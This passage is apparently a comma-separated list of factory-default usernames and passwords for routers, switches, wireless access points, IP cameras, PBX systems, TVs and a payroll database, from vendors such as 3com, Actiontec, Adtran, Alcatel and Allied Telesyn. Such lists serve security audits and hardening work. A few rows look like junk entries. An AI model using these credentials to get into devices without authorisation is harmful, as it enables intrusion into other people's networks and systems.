Switch,,1100/3300,admin,,,,\n3com,SuperStack II Switch,,1100/3300,manager,manager,,,\n3com,SuperStack II Switch,,1100/3300,monitor,monitor,,,\n3com,SuperStack II Switch,,1100/3300,security,security,,,\n3com,SuperStack II Switch,,2200,debug,synnet,,,\n3com,SuperStack II Switch,,2700,tech,tech,,,\n3com,SuperStack II Switch,,Admin,tech,tech,,,\n3com,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize,resets all pws to defaults,\n3com,SuperStack II Switch,2200,Telnet,debug,synnet,,,\n3com,SuperStack II Switch,2700,Telnet,tech,tech,Admin,,\n3com,SuperStack II,,Console,,,Admin,,\n3com,SuperStack III Switch,3300XM,Multi,security,security,Admin,,\n3com,SuperStack III Switch,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings,,\n3com,SuperStack III Switch,4XXX,Multi,admin,,Admin,,\n3com,SuperStack III Switch,4XXX,Multi,monitor,monitor,User,,\n3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ ,\n3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_,\n3com,SuperStack III Switch,4xxx (4900 - sure),console,recover,recover,Admin,,\n3com,Superstack 3 switch,,4900,recover,recover,,,\n3com,Switch 3000/3300,,,Admin,3com,,,\n3com,Switch 3000/3300,,,admin,admin,,,\n3com,Switch 3000/3300,,,manager,manager,,,\n3com,Switch 3000/3300,,,monitor,monitor,,,\n3com,Switch 3000/3300,,,security,security,,,\n3com,Switch,,3300XM,admin,admin,,,\n3com,Switch,3300XM,Multi,admin,admin,Admin,,\n3com,US Robotics ADSL Router,,8550,,12345,,,\n3com,Wireless AP,,,,comcomcom,,,\n3com,Wireless AP,,ANY,admin,comcomcom,,,\n3com,Wireless AP,,Admin,admin,comcomcom,,,\n3com,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs,\n3com,boson router simulator,,User,admin,admin,,,\n3com,cellplex,,,,,,,\n3com,cellplex,,7000,operator,,,,\n3com,cellplex,,Admin,admin,admin,,,\n3com,corebuilder,,7000,operator,admin,,,\n3com,e960,,,Admin,Admin,,,\n3com,e960,3CRWDR100-72,Admin,Admin,Admin,HTTP,http://192.168.1.1,\n3com,hub,,,,,,,\n3com,hub,,Admin,,,,,\n3com,hub,,Multi,,,Admin,,\n3com,router,,,,,,,\n3com,router,,Admin,,,,,\n3com,super stack 2 switch,,,manager,manager,,,\n3com,super stack II,,,,,,,\n3com,super stack II,,Admin,,,,,\n3com,super,,,admin,,,,\n3com,superstack II,,1100/3300,3comcso,RIP000,,,\n3com,superstack II,,initialize,3comcso,RIP000,,,\n3go,3GO11,All,http://80.1.64.217,administrator,246810,Admin,,\n3m,VOL-0215 etc.,,,volition,volition,,,\n3m,VOL-0215 etc.,,Admin,volition,volition,,,\n3m,VOL-0215 etc.,,SNMP,volition,volition,Admin,Volition fiber switches,\n3m,Voliton,,,VOL-0215,,,,\n3m,Voliton,,,volition,volition,,,\n3ware,3DM,,HTTP,Administrator,3ware,Admin,,\nabocom,AP900,,192.168.1.240,,,Admin,,\nabocom,ARM904,,192.168.1.254,,,Admin,,\nabocom,ARM914,,192.168.1.1,admin,admin,Admin,,\nabocom,SWB500,,,,public,,,\nabocom,WAP253,,192.168.1.254,admin,,Admin,,\nabocom,WAP404,,192.168.1.252,,,Admin,,\nabocom,WP102,,192.168.100.252,,,Admin,,\nabocom,WR5201,,10.10.10.254,admin,admin,Admin,,\nabocom,WR5204,,192.168.1.254,admin,admin,Admin,,\nabocom,WR5207,,192.168.1.1,admin,password,Admin,,\nabocom,WR5560,,192.168.1.254,admin,password,Admin,,\nacc,Any router,,,netman,netman,,all,\nacc,Congo/Amazon/Tigris,,,netman,netman,,All versions,\nacc,Tigris Platform,All,Multi,public,,Guest,,\naccelerated networks,DSL CPE and DSLAM,,,sysadm,anicust,,,\nacceleratednetworks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,,,\nacconet,Router,,,Admin,admin,Admin,,\naccton t_online,accton,,,,0,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,admin,,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,manager,manager,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,monitor,monitor,,,\naccton,Gigabit Switches,,,__super,(caclulated),,,\naccton,MR3202A router,,192.168.1.1,root,,Admin,SSID is Wireless Network 1,\naccton,T-ONLINE,,aaaaaaa,,0,,,\naccton,Wireless Router,T-online,HTTP,,0,Admin,,\naccton,Wireless Router,T-online,HTTP,,0000,Admin,,\naccton,Wirelessrouter,,T-online,,0,,,\naceex,Modem ADSL Router,,,admin,,,,\naceex,Modem ADSL Router,,HTTP,admin,,Admin,,\nacer,517te,,,,,,,\nacer,AT2617MF LCD TV,,console,,0000,Unlock the TV,,\nacer,AT2617MF LCD TV,,console,,0423,Super Password,Cannot be changed!,\nacer,AT3217MF LCD TV,,console,,0000,Unlock the TV,,\nacer,AT3217MF LCD TV,,console,,0423,Super Password,Cannot be changed!,\nacer,AT3265,,Onscreen Menu,,0000,Unlock the TV,,\nacer,Aspire EasyStore,,,,admin,Admin,,\nacer,BIOS,,,,,,,\nacer,BIOS,,Console,,,Admin,,\nacer,Phoenix,,,,,,,\nacer,Veriton 5900,,,,admin,Acer-000000,,\nacer,Veriton 5900,,,,admin,Admin,,\nacer,WLANGRU2,,,admin,password,Admin,,\nacer,acer,,,acer,acer,,,\nacer,eRecovery,,,,000000,Admin,,\nacorp,all routers,,http,Admin,Admin,,,\nacti,Most Camera Models,,192.168.0.100,admin,123456 or 12345,administrative,,\nactiontec,,,192.168.1.1,admin,password1,Admin,This the password commonly set by VZ Techs.,\nactiontec,802AA,,192.168.0.250,Admin,,Admin,SSID is ACTIONTEC_11A,\nactiontec,AU802C,,192.168.1.240,Admin,Admin,Admin,,\nactiontec,F2250,,192.168.254.254,,,Admin,,\nactiontec,GE344000-01 Router,,,,,,,\nactiontec,GT701,,http://192.168.0.1,admin,,,,\nactiontec,GT701-GW,,Multi,admin,admin,,,\nactiontec,GT701-WG,,192.168.1.1,admin,password,,,\nactiontec,GT701-WG,,HTTP,admin,password,192.168.1.1,,\nactiontec,GT701GW,,Multi,admin,admin,,,\nactiontec,GT701WG,,192.168.0.1,,,Admin,,\nactiontec,GT701WG,,HTTP,admin,password,192.168.1.1,,\nactiontec,GT704,,192.168.0.1,admin,,Admin,,\nactiontec,GT704WG,,192.168.1.1,admin,password,Admin,,\nactiontec,GT704WGRV,,192.168.0.1,,,Admin,,\nactiontec,GT724WG,,192.168.0.1,,,Admin,,\nactiontec,GT784WN,,192.168.0.1,,,Admin,,\nactiontec,M1000 modem,,192.168.0.1,,,Admin,SSID is like myqwestXXXX,\nactiontec,M1424WR,,,admin,password,,,\nactiontec,MI424WR modem,,192.168.1.1,,,Admin,,\nactiontec,PK5000 modem,,192.168.0.1,,,Admin,SSID is like myqwestXXXX,\nactiontec,R1520SU,,,admin,,Admin,,\nactiontec,R1524 modem,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3000 router,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3010UW router,,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,R3010UW(AP),,192.168.0.1,,,Admin,SSID is ACTIONTEC,\nactiontec,V1000H,Telus,http://192.168.1.254,admin,telus,,,\nactiontec,W1424WR FiOS router,,,admin,password,Admin,Verizon,\nactiontec,gt701,,http://192.168.0.1,admin,,,,\nactiontec,gt701-gw,,,admin,admin,,,\nadaptec,AWN-8060,AP,,admin,,Admin,SSID is Adaptec,\nadaptec,AWN-8084,router,192.168.8.1,admin,,Admin,SSID is Adaptec,\nadaptec,RAID Controller,,,Administrator,adaptec,,,\nadaptec,Storage Manager Pro,,,Administrator,adaptec,,All,\nadaptecraid,Storage Manager Pro,,,Administrator,adaptec,,All,\nadb,DV2211 modem,,192.168.1.1,admin,admin,Admin,,\nadb,P.DG A2100N modem,,192.168.1.1,admin,password,Admin,,\nadc kentrox,Pacesetter Router,,,,secret,,,\nadckentrox,Pacesetter Router,,Telnet,,secret,,,\nadcompletecom,Ban Man Pro,,,Admin1,Admin1,,,\naddtron,ADR-E200P,router,192.168.1.1,root,,Admin,SSID is WLAN,\naddtron,AWS-100,AP,,default,WLAN_AP,Admin,SSID is WLAN,\nadic,24,,HTTP,admin,password,,,\nadic,Scalar 100/1000,,HTTP,admin,secure,Admin,,\nadic,Scalar i2000,,Multi,admin,password,Admin,,\nadobe,CQ,,,admin,admin,,,\nadobe,CQ,,,author,author,,,\nadobe,Experience Manager,,,admin,admin,,,\nadobe,Experience Manager\\CQ,,,anonymous,anonymous,,,\nadobe,Experience Manager\\CQ,,,aparker@geometrixx.info,aparker,,,\nadobe,Experience Manager\\CQ,,,jdoe@geometrixx.info,jdoe,,,\nadobe,Experience Manager\\CQ,,,replication-receiver,replication-receiver,,,\nadobe,Vignette Connector,,,vgnadmin,vgnadmin,,,\nadp,ADP Payroll Database,,,sys,adpadmin,,,\nadp,ADP Payroll HR database,,Admin,sysadmin,master,,,\nadp,ADP Payroll HR database,,All,sysadmin,master,,,\nadp,ADP Payroll HR database,All,Multi,sysadmin,master,Admin,,\nadt,Safewatch Pro3000,,,,2580,,,\nadtech,AX4000,,,root,ax400,,,\nadtech,AX4000,,,root,ax400,Admin,,\nadtran,Agent Card,,,,ADTRAN,,,\nadtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT,\nadtran,Atlas 800/800Plus/810Plus/550,,,,Password,,,\nadtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L,\nadtran,Express 5110/5200/5210,,,,adtran,,,\nadtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,MX2800,,,,adtran,,,\nadtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,NetVanta 7100,,,admin,password,,,\nadtran,NetVanta 7100,,Multi,admin,password,,,\nadtran,NetVanta,,,admin,password,,,\nadtran,NxIQ,,,,adtran,,,\nadtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times,\nadtran,Smart 16/16e,,,,PASSWORD,,,\nadtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times,\nadtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times,\nadtran,T3SU 300,,,,adtran,,,\nadtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times,\nadtran,TSU IQ/DSU IQ,,,,,,,\nadtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times,\nadtran,TSU Router Module/L128/L768/1.5,,,,,,,\nadtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times,\nadvanced integration,PC BIOS,,,,Advance,,,\nadvanced integration,PC BIOS,,Admin,,Advance,,,\nadvancedintegration,PC BIOS,,Console,,Advance,Admin,,\nadvanteknetworks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,,\naerohive,HiveAP 350,AP,,admin,aerohive,Admin,SSID is like AH-XXXXXX_ac,\naethra,Starbridge EU,,HTTP,admin,password,Admin,,\nagasio,A502W,Camera,DHCP,admin,,Admin,,\nagasio,A502W-B,Camera,DHCP,admin,,Admin,,\nagasio,A503W,Camera,DHCP,admin,,Admin,,\nagasio,A503W-B,Camera,DHCP,admin,,Admin,,\nagasio,A503W-W,Camera,DHCP,admin,,Admin,,\nagere,AP-2000,AP,10.0.0.1,,public,Admin,,\nagere,ORiNOCO AP-200,AP,169.254.0.2,admin,,Admin,,\nairaya,Corp AIRAYA WirelessGRID,,,Airaya,Airaya,,,\nairlink plus,RTW026,,V0.80.0010 (firmware),,admin,,,\nairlink101,AP311W,repeater,192.168.1.250,admin,admin,Admin,,\nairlink101,AP411W,AP,10.0.0.1,admin,admin,Admin,,\nairlink101,AP671W,AP,192.168.2.250,admin,password,Admin,,\nairlink101,AR315W,router,192.168.1.1,admin,admin,Admin,,\nairlink101,AR325W,router,192.168.1.1,,admin,Admin,,\nairlink101,AR550W3G,hotspot,192.168.2.1,,,Admin,,\nairlink101,AR570W,V2,192.168.2.1,,admin,Admin,,\nairlink101,AR570W,router,192.168.2.1,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1500W,v2,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1620PoE,wired camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1620W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1747W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN1777W,camera,DHCP,admin,admin,Admin,,\nairlink101,SkyIPCam AICN500,night vision camera,DHCP,admin,admin,Admin,,\nairnet,AWR014G8,router,192.168.1.1,admin,admin,Admin,,\naironet,(All),,,,,,,\naironet,all products,all vers,,,,,,\nairtightnetworks,C-75,AP,192.168.1.245,,,Admin,,\nairtightnetworks,C-75-E,AP,192.168.1.245,,,Admin,,\nairvast,WA-1300,AP,192.168.1.90,,,Admin,,\nairvast,WR-2000,AP,192.168.62.1,admin,1234,Admin,,\nairway,Transport,,,,0,admin,,\nairway,Transport,,,,0000,admin,,\naladdin,eSafe Appliance,,,root,kn1TG7psLu,,,\naladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root,,\nalaxala,AX780R,router,,operator,,Admin,,\nalcatel thomson,SpeedTouch580,,,admin,admin,,,\nalcatel,4400,,Console,mtcl,,User,,\nalcatel,4400,,Superuser,superuser,superuser,,,\nalcatel,4400,PBX,Port 2533,adfexc,adfexc,,,\nalcatel,4400,PBX,Port 2533,at4400,at4400,,,\nalcatel,4400,PBX,Port 2533,client,client,,,\nalcatel,4400,PBX,Port 2533,dhs3mt,dhs3mt,,,\nalcatel,4400,PBX,Port 2533,dhs3pms,dhs3pms,,,\nalcatel,4400,PBX,Port 2533,halt,tlah,shutdown,,\nalcatel,4400,PBX,Port 2533,install,llatsni,,,\nalcatel,4400,PBX,Port 2533,kermit,kermit,,,\nalcatel,4400,PBX,Port 2533,mtch,mtch,,,\nalcatel,4400,PBX,Port 2533,mtcl,mtcl,,,\nalcatel,4400,PBX,Port 2533,root,letacla,,,\nalcatel,6224-24p,,console,admin,switch,,,\nalcatel,OS6850-24p,,console,admin,switch,,,\nalcatel,OXO,1.3,Multi,,admin,User,,\nalcatel,OXO,7,,installer,pbxk1064,,,\nalcatel,Office 4200,,,,1064,,,\nalcatel,Office 4200,,Admin,,1064,,,\nalcatel,Office 4200,,Multi,,1064,Admin,,\nalcatel,OmniPCX Office,,Admin,ftp_admi,kilo1987,,,\nalcatel,OmniPCX Office,,Installer,ftp_inst,pbxk1064,,,\nalcatel,OmniPCX Office,,NMC,ftp_nmc,tuxalize,,,\nalcatel,OmniPCX Office,,Operator,ftp_oper,help1954,,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC,,\nalcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator,,\nalcatel,OmniPCX Office,4.1,Multi,ftp_admi,kilo1987,Admin,,\nalcatel,OmniPCX Office,4.1,Other,ftp_inst,pbxk1064,Installer,,\nalcatel,OmniPCX Office,4.1,Other,ftp_nmc,tuxalize,NMC,,\nalcatel,OmniPCX Office,4.1,Other,ftp_oper,help1954,Operator,,\nalcatel,OmniPCX,4.1 and above,Voicemail (User),,1515,,,\nalcatel,OmniStack 6024,,,admin,switch,,,\nalcatel,OmniStack 6024,,Admin,admin,switch,,,\nalcatel,OmniStack 6024,,Telnet,admin,switch,Admin,,\nalcatel,OmniStack/OmniSwitch,,Telnet,diag,switch,Admin,,\nalcatel,OmniStack/OmniSwitch,,Telnet/Console,diag,switch,Admin,,\nalcatel,Omnistack/Omniswitch,,,diag,switch,,,\nalcatel,PBX,,4400,adfexc,adfexc,,,\nalcatel,PBX,,4400,at4400,at4400,,,\nalcatel,PBX,,4400,client,client,,,\nalcatel,PBX,,4400,dhs3mt,dhs3mt,,,\nalcatel,PBX,,4400,dhs3pms,dhs3pms,,,\nalcatel,PBX,,4400,halt,tlah,,,\nalcatel,PBX,,4400,install,llatsni,,,\nalcatel,PBX,,4400,kermit,kermit,,,\nalcatel,PBX,,4400,mtch,mtch,,,\nalcatel,PBX,,4400,mtcl,mtcl,,,\nalcatel,PBX,,4400,root,letacla,,,\nalcatel,PBX,,unknown,adfexc,adfexc,,,\nalcatel,PBX,,unknown,at4400,at4400,,,\nalcatel,PBX,,unknown,client,client,,,\nalcatel,PBX,,unknown,dhs3mt,dhs3mt,,,\nalcatel,PBX,,unknown,dhs3pms,dhs3pms,,,\nalcatel,PBX,,unknown,halt,tlah,,,\nalcatel,PBX,,unknown,install,llatsni,,,\nalcatel,PBX,,unknown,kermit,kermit,,,\nalcatel,PBX,,unknown,mtch,mtch,,,\nalcatel,PBX,,unknown,mtcl,mtcl,,,\nalcatel,PBX,,unknown,root,letacla,,,\nalcatel,PBX,4400,Port 2533,adfexc,adfexc,unknown,,\nalcatel,PBX,4400,Port 2533,at4400,at4400,unknown,,\nalcatel,PBX,4400,Port 2533,client,client,unknown,,\nalcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,unknown,,\nalcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,unknown,,\nalcatel,PBX,4400,Port 2533,halt,tlah,shutdown,,\nalcatel,PBX,4400,Port 2533,install,llatsni,unknown,,\nalcatel,PBX,4400,Port 2533,kermit,kermit,unknown,,\nalcatel,PBX,4400,Port 2533,mtch,mtch,unknown,,\nalcatel,PBX,4400,Port 2533,mtcl,mtcl,unknown,,\nalcatel,PBX,4400,Port 2533,root,letacla,unknown,,\nalcatel,ST2030,All,10.1.24.88,administrator,784518,Admin,,\nalcatel,SpeedTouch 510,,192.168.1.254/24,,,,Default IP 192.168.1.254/24,\nalcatel,SpeedTouch 510,,HTTP/Telnet,,,,Default IP 192.168.1.254/24,\nalcatel,SpeedTouch 530,All,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch 536,Bigpond firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Bigpond-issued devices,\nalcatel,SpeedTouch 536,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 536,v6 Telstra firmware,192.168.1.254 or 10.0.0.138,admin,admin,Admin,Telstra-issued devices,\nalcatel,SpeedTouch 536,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 546,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 546,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 570,All,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch 580,4.3.19,HTTP,admin,admin,,,\nalcatel,SpeedTouch 580,Most,192.168.1.254,Administrator,,2012-01-08,,\nalcatel,SpeedTouch 585,Most,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch 585,v6,192.168.1.254,Administrator,,Admin,,\nalcatel,SpeedTouch Home,All,10.0.0.138,(no default),(no default),Admin,,\nalcatel,SpeedTouch Pro,4-Port FW,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch Pro,4-Port,10.0.0.138,,,Admin,,\nalcatel,SpeedTouch Pro,All,10.0.0.138,admin,admin,Admin,,\nalcatel,Speedtouch 585,V6,,Admin,23698,,,\nalcatel,Speedtouch,,500 series,,,,,\nalcatel,TG585,v7,192.168.1.254,Administrator,,Admin,,\nalcatel,TG782T,All,10.0.0.138 or 192.168.1.254 or bigpond.bigpond,admin,,Admin,Modem locked to Bigpond or Telstra,\nalcatel,Technicolor TG587n,v3,admin,admin,Admin,2012-01-08,,\nalcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036,\nalcatel,Timestep VPN Gateway 15xx/45xx/7xxx,,,root,permit,,Any,\nalcatel,iptouch,all,phone,,0000,push i key,,\nalcatellucent,CellPipe 7130 RG,5Ae.A2010,192.168.1.1,admin,admin,Admin,,\nalcatellucent,RG200E-CA,router,192.168.1.1,,,Admin,SSID is like ChinaNet-XXXX,\nalfanetwork,AIP-W411,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AIP-W505,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AIP-W610H,router,192.168.2.1,admin,admin,Admin,,\nalfanetwork,AP51,AP,10.0.0.1,admin,admin,Admin,,\nalfanetwork,R36,router,192.168.2.1,admin,admin,Admin,,\nalice,IAD WLAN 4421,modem,192.168.1.1,,,Admin,SSID is like ALICE-WLANXX,\nalientechnology,ALR-9900,,,root,alien.,,,\nallan,ass,,tool,tool,face,,,\nallied telesyn,8326G,,,,,,,\nallied telesyn,AT-8024(GB),,,,admin,,,\nallied telesyn,AT-8024(GB),,,manager,admin,,,\nallied telesyn,AT-8024(GB),,any,,admin,,,\nallied telesyn,All,,Admin,manager,friend,,,\nallied telesyn,All,,All,manager,friend,,,\nallied telesyn,Generic Switch/Router,,,manager,friend,,,\nallied telesyn,Generic Switch/Router,,Admin,manager,friend,,,\nallied telesyn,Rapier G6 Switch,,,,manager,,,\nallied telesyn,Switch,,AT-8124XL 1.0.3,admin,,,,\nallied telesyn,Switch,,Admin,admin,,,,\nallied,CJ8MO E-U,,,,,,,\nallied,CJ8MO E-U,,Admin,,,,,\nallied,CJ8MO E-U,,Telnet,,,Admin,,\nallied,Telesyn,,,manager,friend,,,\nallied,Telesyn,,,secoff,secoff,,,\nallied,Telesyn,,Admin,manager,friend,,,\nallied,Telesyn,,Admin,secoff,secoff,,,\nallied-telesyn,AT-8550GB,,,manager,friend,,,\nallied-telesyn,AT-RG613LH,,,manager,friend,,,\nallieddata,CopperJet 1610,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1612,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1614,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1616,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1620,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1622,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1624,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 1626,6.1,172.19.3.1(ethernet) 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 408,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 409,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 412,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 416,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 417,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 422,5.16,172.19.3.1,admin,admin,Admin,,\nallieddata,CopperJet 426,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 427,1.1,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 810,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 811,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 812,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 813,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 814,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 815,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 816,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 816_2P,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 817,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 820,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 821,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 822,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 823,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 824,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 825,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 826,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 827,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 828,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,CopperJet 829,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 110,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 140,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 2440,All,192.168.1.1,admin,admin,Admin,,\nallieddata,Tornado 2440,All,192.168.1.1,user,user,Display device status,,\nallieddata,Tornado 2441,All,192.168.1.1,admin,admin,Admin,,\nallieddata,Tornado 2441,All,192.168.1.1,user,user,Display device status,,\nallieddata,Tornado 810,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 820,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 822,5.15,172.19.3.1(ethernet) or 172.20.3.1(usb),admin,admin,Admin,,\nallieddata,Tornado 830,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 831,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 840,All,192.168.123.254,,admin,Admin,,\nallieddata,Tornado 841,All,192.168.123.254,,admin,Admin,,\nalliedtelesyn,ALAT8326GB,,Multi,manager,manager,Admin,,\nalliedtelesyn,AT Router,,HTTP,root,,Admin,,\nalliedtelesyn,AT-8024(GB),,Console,,admin,Admin,,\nalliedtelesyn,AT-8024(GB),,HTTP,manager,admin,Admin,,\nalliedtelesyn,AT-8550GB,,Telnet,manager,friend,,,\nalliedtelesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is 192.168.242.242,\nalliedtelesyn,AT-AR750S,,,manager,friend,,,\nalliedtelesyn,AT-RG613LH,2-3_59,Telnet,manager,friend,,,\nalliedtelesyn,AT8000S/24,v1.1.0.32,serial console,manager,friend,admin,,\nalliedtelesyn,AT8016F,,Console,manager,friend,Admin,,\nalliedtelesyn,All Routers,,,Manager,Friend,,Any,\nalliedtelesyn,All,All,Telnet,manager,friend,Admin,,\nalliedtelesyn,Allied Telesyn,AR410,,Administrator,admin,,,\nalliedtelesyn,Generic Switch/Router,,Multi,manager,friend,Admin,,\nalliedtelesyn,R130,,,Manager,friend,,,\nalliedtelesyn,Rapier G6 Switch,,,manager,friend,,,\nalliedtelesyn,Switch,AT-8124XL 1.0.3,Multi,admin,,Admin,,\nalliedtelesyn,Various,,Multi,manager,friend,Admin,,\nalliedtelesyn,Various,,Multi,secoff,secoff,Admin,,\nalliedtelesyn,at-img634w,a+,multi,manager,friend,,,\nalliedtelesyn,windows xp, AR410,http://192.168.1.174,admin,admin,user,HACK,\nalliedtelesyn,windows xp,AR410,http://192.168.1.174,admin,admin,user,HACK,\nallnet,ALL0275 802.11g AP,,1.0.6,,admin,,,\nallnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin,,\nallnet,ALL0305,,192.168.1.1,root,admin,Admin,,\nallnet,ALL129DSL,,,admin,admin,,,\nallnet,ALL129DSL,,,admin,admin,Administrator,Likely the default on all routers,\nallnet,T-DSL Modem,,Software Version: v1.51,admin,admin,,,\nallnet,T-DSL Modem,Software Version: v1.51 ,HTTP,admin,admin,Admin,,\nallnet,T-DSL Modem,Software Version: v1.51,HTTP,admin,admin,Admin,,\nallot,Netenforcer,,,admin,allot,,,\nallot,Netenforcer,,,admin,allot,Admin,,\nallot,Netenforcer,,,root,bagabu,,,\nallot,Netenforcer,,,root,bagabu,Admin,,\nalpha,3100-4G,,192.168.1.1,,,Admin,,\nalpha,AFW-GR50,,192.168.1.1,admin,admin,Admin,SSID is 'Default',\nalteon,ACEDirector3,,,admin,,,,\nalteon,ACEDirector3,,console,admin,,,,\nalteon,ACEswitch 180e (telnet),,,admin,blank,,,\nalteon,ACEswitch,,,admin,,,,\nalteon,ACEswitch,,180e,admin,,,,\nalteon,ACEswitch,,Admin,admin,admin,,,\nalteon,ACEswitch,,Admin,admin,linga,,,\nalteon,ACEswitch,180e,HTTP,admin,admin,Admin,,\nalteon,ACEswitch,180e,HTTP,admin,linga,Admin,,\nalteon,AD4,9,Console,admin,admin,Admin,Factory default,\nalteon,All hardware 